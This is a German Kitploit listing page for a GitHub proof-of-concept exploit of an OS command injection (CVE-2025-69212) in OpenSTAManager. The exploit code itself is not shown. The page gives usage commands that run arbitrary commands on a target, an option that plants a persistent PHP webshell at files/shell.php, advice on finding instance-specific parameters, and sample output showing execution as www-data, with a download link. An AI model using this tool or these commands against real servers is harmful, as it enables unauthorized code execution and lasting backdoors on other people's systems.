Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-69212-PoC — CVE-2025-69212 - OpenSTAManager OS-Befehlseinschleusung PoC | Kitploit
Tools/GitHubGitHub/alaeddine03/cve-2025-69212-poc
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubalaeddine03/cve-2025-69212-poc

CVE-2025-69212-PoC

CVE-2025-69212 - OpenSTAManager OS-Befehlseinschleusung PoC

Repository anzeigen
48vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-69212 - OpenSTAManager OS Command Injection PoC

Verwendung

Abhängigkeiten installieren:

root@kitploit:~
pip install -r requirements.txt

Einzelnen Befehl ausführen und dessen Ausgabe anzeigen:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'

Stattdessen eine persistente PHP-Webshell ablegen:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell

Optionen

FlagBeschreibung
-u, --urlBasis-URL der Zielinstanz
-U, --usernameBenutzername für die Authentifizierung
-P, --passwordPasswort für die Authentifizierung
-c, --commandAuszuführender Befehl, Ausgabe wird in pwn_out.txt gespeichert
--shellStatt eines einzelnen Befehls eine PHP-Webshell unter files/shell.php ablegen
--id-moduleModul-ID für die Rechnungsimportfunktion (Standard: 14)
--id-pluginPlugin-ID für die Rechnungsimportfunktion (Standard: 48)

id_module und id_plugin sind instanzspezifisch. Wenn die Standardwerte nicht funktionieren, melden Sie sich in der Web-Oberfläche des Ziels an, navigieren Sie zur Funktion zum Importieren elektronischer Rechnungen und überprüfen Sie die Request-Parameter im Netzwerk-Tab Ihres Browsers.

Beispielausgabe

root@kitploit:~
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------
Tool herunterladen